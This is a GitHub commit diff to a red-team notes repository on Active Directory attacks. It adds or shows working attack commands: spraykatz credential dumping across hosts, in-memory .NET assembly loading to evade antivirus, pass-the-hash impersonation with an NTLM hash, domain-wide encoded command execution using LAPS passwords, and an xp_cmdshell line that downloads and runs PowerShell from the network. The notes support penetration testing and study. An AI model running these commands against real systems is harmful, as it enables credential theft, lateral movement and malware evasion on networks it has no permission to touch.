[AHK] Automatic update 👽

snovvcrash · Jun 23, 2021 · ddd5159 · ddd5159
1 parent 292ccc2
commit ddd5159
Show file tree

Hide file tree

Showing 8 changed files with 69 additions and 26 deletions.
diff --git a/dev/git.md b/dev/git.md
@@ -24,10 +24,13 @@ $ git version
 Syncing a forked repository:
 
 ```
+ # Add remote upstream
 $ git remote add upstream https://github.com/original/repository.git
 $ git fetch upstream
-$ git checkout --track master
 $ git rebase upstream/master (or git merge upstream/master)
+ # Update fork from original repo
+$ git pull upstream master
+ # Push the updates to fork
 $ git push -f origin master
 ```
 

diff --git a/pentest/infrastructure/ad/README.md b/pentest/infrastructure/ad/README.md
@@ -342,3 +342,13 @@ PS > Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 -Username
 PS > Invoke-SQLOSCmd -Username sa -Password 'Passw0rd!' -Instance sqlsrv01.megacorp.local -Command whoami
 PS > Invoke-SQLAudit -Instance WEB01 -Username sa -Password 'Passw0rd!' -Verbose
 ```
+
+
+
+### spraykatz
+
+* [https://github.com/aas-n/spraykatz](https://github.com/aas-n/spraykatz)
+
+```
+$ python3 spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39
+```
diff --git a/pentest/infrastructure/ad/av-evasion.md b/pentest/infrastructure/ad/av-evasion.md
@@ -51,8 +51,9 @@ PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll))
 ## .NET Reflective Assembly
 
 * [https://github.com/S3cur3Th1sSh1t/PowerSharpPack#powersharppack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack#powersharppack)
+* [https://github.com/GhostPack/Rubeus#sidenote-running-rubeus-through-powershell](https://github.com/GhostPack/Rubeus#sidenote-running-rubeus-through-powershell)
 
-A way to bypass AV signature analysis: you can Gzip-compress and Base64-encode a .NET assembly to load it reflectively via PowerShell right from memory:
+A way to bypass AV signature analysis: you can Gzip-compress and Base64-encode a .NET assembly to load it reflectively via PowerShell right from memory (when compiling the binary, make `Program` class and its `Main` method public):
 
 {% code title="CompressEncodeAssembly.ps1" %}
 ```powershell
@@ -68,7 +69,7 @@ $encodedZipped
 ```
 {% endcode %}
 
-This [blog post](https://www.praetorian.com/blog/running-a-net-assembly-in-memory-with-meterpreter) covers the topic in depth. Also here is [an example](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/efd22a64fe05e7a23e57616370e2e00981f276b6/PowerSharpBinaries/Invoke-SharpMapExec.ps1) how the binary can be actually decoded, decompressed and run from memory.
+This [blog post](https://www.praetorian.com/blog/running-a-net-assembly-in-memory-with-meterpreter) covers the topic in depth. Also here is [an example](https://github.com/snovvcrash/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpMapExec.ps1) how the binary can be actually decoded, decompressed and run from memory.
 
 
 

diff --git a/pentest/infrastructure/ad/gpo-buse.md b/pentest/infrastructure/ad/gpo-buse.md
@@ -9,6 +9,12 @@ description: Group Policy Objects
 * [https://habr.com/ru/company/jetinfosystems/blog/449278/](https://habr.com/ru/company/jetinfosystems/blog/449278/)
 * [https://github.com/EvotecIT/GPOZaurr](https://github.com/EvotecIT/GPOZaurr)
 
+Force GPO update on all domain computers:
+
+```
+PS > Get-ADComputer -Filter * | % {Invoke-GPUpdate -Computer $_.name -Force -RandomDelayInMinutes 0}
+```
+
 
 
 

diff --git a/pentest/infrastructure/ad/lateral-movement.md b/pentest/infrastructure/ad/lateral-movement.md
@@ -295,30 +295,49 @@ Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:f
 
 
 
+### NamedPipePTH
 
-## Pass-the-Hash
+* [https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/](https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/)
+* [https://github.com/S3cur3Th1sSh1t/NamedPipePTH](https://github.com/S3cur3Th1sSh1t/NamedPipePTH)
+* [https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH](https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH)
+* [https://github.com/snovvcrash/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpNamedPipePTH.ps1](https://github.com/snovvcrash/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpNamedPipePTH.ps1)
+
+Impersonate a user with Pass-the-Hash for **local** actions (because network authentication does not work with `Impersonation Token`, only with `Delegation Token`):
+
+```
+PS > . .\Invoke-SharpNamedPipePTH.ps1
+PS > Invoke-SharpNamedPipePTH -C "domain:megacorp.local username:snovvcrash hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe"
+```
 
+Can be used for authenticating in SQL Server management tools (`%PROGRAMFILES(X86)%\Ssms.exe\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe`) and accessing DBs with SQL admin hash, for example.
 
 
-### User Account Control
 
-* [https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
 
+## PtH Notes
 
-#### LocalAccountTokenFilterPolicy
 
-* [LocalAccountTokenFilterPolicy](https://docs.microsoft.com/ru-ru/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction) - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy`
+#### User Account Control
+
+* [https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
+
+##### LocalAccountTokenFilterPolicy
+
+| **Property Name**                                                                                                                                          | **Property Path**                                                                              |
+|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------|
+| [LocalAccountTokenFilterPolicy](https://docs.microsoft.com/ru-ru/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction) | `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy` |
 
 If `LocalAccountTokenFilterPolicy` exists and set to `1` (doesn't exist by default), remote connections from **all** local admins are not affected by UAC and PtH will succeed:
 
 ```
 PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy
 ```
 
+##### FilterAdministratorToken
 
-#### FilterAdministratorToken
-
-* [FilterAdministratorToken](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/7c705718-f58e-4886-8057-37c8fd9aede1) - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken`
+| **Property Name**                                                                                                                     | **Property Path**                                                                         |
+|---------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------|
+| [FilterAdministratorToken](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/7c705718-f58e-4886-8057-37c8fd9aede1) | `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken` |
 
 If `FilterAdministratorToken` exists and set to `1` (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail:
 

diff --git a/pentest/infrastructure/ad/ntlm.md b/pentest/infrastructure/ad/ntlm.md
@@ -10,6 +10,20 @@ description: NT LAN Manager
 
 
 
+## Calculate NTLM
+
+* [https://www.browserling.com/tools/ntlm-hash](https://www.browserling.com/tools/ntlm-hash)
+
+With Python 3:
+
+```python
+>>> import hashlib
+>>> hashlib.new('md4', 'Passw0rd!'.encode('utf-16le')).hexdigest()
+```
+
+
+
+
 ## Responder Capture Structure
 
 * [https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149](https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149)
@@ -46,7 +60,7 @@ description: NT LAN Manager
 * [https://luemmelsec.github.io/Relaying-101/](https://luemmelsec.github.io/Relaying-101/)
 * [[PDF] Lateral Movement using Credentials Relaying (taso_x)](https://drive.google.com/file/d/1t8akbdgan7i9Rw0tFEIP223CmHFlTRCH/view?usp=sharing)
 
-Generate relay list with cme and enumerate local admins when relaying
+Generate relay list with cme and enumerate local admins when relaying:
 
 ```
 $ cme smb 192.168.2.0/24 --gen-relay-list out.txt

diff --git a/pentest/infrastructure/ad/post-exploitation.md b/pentest/infrastructure/ad/post-exploitation.md
@@ -53,7 +53,7 @@ An example PowerShell script to execute commands as a local admin on all domain
 
 {% code title="ADComputersCmd.ps1" %}
 ```powershell
-# Save with Encoding "UTF-8 with BOM"
+ # Save with Encoding "UTF-8 with BOM"
 
 [System.Console]::OutputEncoding = [System.Text.Encoding]::UTF8
 $ErrorActionPreference = "Stop"
@@ -63,8 +63,8 @@ $command += 'whoami > C:\Windows\Temp\whoami.txt 2>&1'
 $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
 $encodedCommand = [Convert]::ToBase64String($bytes)
 
-Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | ? {$_.Name -ne $(hostname)} | select Name,ms-Mcs-AdmPwd | ForEach-Object {
-	$comp = $_."Name"
+Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | ? {$_.name -ne $(hostname)} | select name,ms-Mcs-AdmPwd | ForEach-Object {
+	$comp = $_."name"
 	$pass = $_."ms-Mcs-AdmPwd"
 
 	if (Test-Connection -BufferSize 32 -Count 1 -ComputerName $comp -Quiet) {
@@ -92,13 +92,3 @@ Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | ? {$_.Name -ne $(hostname)}
 }
 ```
 {% endcode %}
-
-
-
-### spraykatz
-
-* [https://github.com/aas-n/spraykatz](https://github.com/aas-n/spraykatz)
-
-```
-$ python3 spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39
-```
diff --git a/pentest/infrastructure/dbms.md b/pentest/infrastructure/dbms.md
@@ -53,7 +53,7 @@ SQL> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).Dow
 
 Change `MSSQL_SERVER`, `MSSQL_USERNAME` and `MSSQL_PASSWORD` before running.
 
-A scenario when abusing SeImpersonatePrivilege with PrintSpoofer (BadPotato):
+A scenario when [abusing SeImpersonatePrivilege with PrintSpoofer](/pentest/infrastructure/ad/privileges-abuse#printspoofer) (BadPotato):
 
 ```
 $ python3 mssql_shell.py